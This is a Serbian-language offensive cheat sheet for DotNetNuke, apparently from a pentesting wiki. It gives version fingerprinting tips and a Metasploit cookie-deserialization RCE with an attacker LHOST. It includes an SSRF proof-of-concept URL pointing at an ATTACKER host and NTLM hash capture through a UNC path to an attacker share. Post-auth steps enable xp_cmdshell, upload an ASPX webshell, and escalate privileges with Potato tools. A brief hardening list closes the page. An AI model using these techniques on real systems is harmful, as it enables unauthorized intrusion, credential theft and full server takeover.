DotNetNuke (DNN)

Reading time: 4 minutes

DotNetNuke (DNN)

Ako se prijavite kao administrator u DNN, lako je dobiti RCE, međutim, u poslednjih nekoliko godina objavljeno je nekoliko neautentifikovanih i post-auth tehnika. Ova cheat-sheet sakuplja najkorisnije primitivne tehnike za ofanzivni i defanzivni rad.

Verzija i Okruženje

• Proverite X-DNN HTTP odgovorni header – obično otkriva tačnu verziju platforme.
• Čarobnjak za instalaciju otkriva verziju u /Install/Install.aspx?mode=install (pristup na veoma starim instalacijama).
• /API/PersonaBar/GetStatus (9.x) vraća JSON blob koji sadrži "dnnVersion" za korisnike sa niskim privilegijama.
• Tipični kolačići koje ćete videti na aktivnoj instanci:
• .DOTNETNUKE – ASP.NET forms authentication ticket.
• DNNPersonalization – sadrži XML/serijalizovane podatke o korisničkom profilu (stare verzije – vidi RCE ispod).

Neautentifikovana Eksploatacija

1. Deserializacija Kolačića RCE (CVE-2017-9822 & follow-ups)

Zahvaćene verzije ≤ 9.3.0-RC

DNNPersonalization se deserializuje pri svakoj zahtev kada je ugrađeni 404 handler omogućen. Tako kreirani XML može dovesti do proizvoljnih gadget lanaca i izvršavanja koda.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

Modul automatski bira pravi put za zakrpljene, ali još uvek ranjive verzije (CVE-2018-15811/15812/18325/18326). Eksploatacija funkcioniše bez autentifikacije na 7.x–9.1.x i sa verifikovanim nalozima sa niskim privilegijama na 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Pogođene verzije < 9.13.8 – Zakrpa objavljena aprila 2025

Zaobilaženje starijeg DnnImageHandler rešenja omogućava napadaču da primora server da izda arbitrarne GET zahteve (polu-slepi SSRF). Praktični uticaji:

• Interni port skeniranje / otkrivanje metapodataka u cloud implementacijama.
• Dostupnost hostova koji su inače zaštićeni od Interneta.

Dokaz koncepta (zameni TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

Zahtev se pokreće u pozadini; pratite svog slušatelja za povratne pozive.

3. Izloženost NTLM heša putem UNC preusmeravanja (CVE-2025-52488)

Zahvaćene verzije 6.0.0 – 9.x (< 10.0.1)

Specijalno oblikovan sadržaj može naterati DNN da pokuša da preuzme resurs koristeći UNC put kao što je \\attacker\share\img.png. Windows će rado izvršiti NTLM pregovaranje, otkrivajući heševe server-računa napadaču. Ažurirajte na 10.0.1 ili onemogućite odlazni SMB na vatrozidu.

4. Zaobilaženje IP filtera (CVE-2025-52487)

Ako administratori oslanjaju na Host/IP filtere za zaštitu administrativnog portala, imajte na umu da se verzije pre 10.0.1 mogu zaobići manipulacijom X-Forwarded-For u scenariju obrnute proxy.

Post-autentifikacija do RCE

Putem SQL konzole

Pod Settings → SQL ugrađeni prozor za upite omogućava izvršavanje protiv baze podataka sajta. Na Microsoft SQL Server-u možete omogućiti xp_cmdshell i pokrenuti komande:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Putem ASPX webshell upload

1. Idite na Settings → Security → More → More Security Settings.
2. Dodajte aspx (ili asp) u Allowable File Extensions i Save.
3. Idite na /admin/file-management i otpremite shell.aspx.
4. Aktivirajte ga na /Portals/0/shell.aspx.

Eskalacija privilegija na Windows-u

Kada se postigne izvršenje koda kao IIS AppPool<Site>, primenjuju se uobičajene tehnike eskalacije privilegija na Windows-u. Ako je sistem ranjiv, možete iskoristiti:

• PrintSpoofer / SpoolFool za zloupotrebu SeImpersonatePrivilege.
• Juicy/Sharp Potatoes za bekstvo iz Service Accounts.

Preporuke za jačanje (Plavi tim)

• Ažurirajte na najmanje 9.13.9 (popravlja SSRF zaobilaženje) ili po mogućstvu 10.0.1 (IP filter i NTLM problemi).
• Uklonite preostale InstallWizard.aspx* datoteke nakon instalacije.
• Onemogućite odlazni SMB (portovi 445/139) izlaz.
• Sprovodite jake Host Filters na ivici proksija umesto unutar DNN.
• Blokirajte pristup /API/RemoteContentProxy ako se ne koristi.

Reference

• Metasploit dnn_cookie_deserialization_rce modul dokumentacija – praktični detalji o neautentifikovanom RCE (GitHub).
• GitHub Security Advisory GHSA-3f7v-qx94-666m – informacije o SSRF zaobilaženju i zakrpi za 2025. godinu.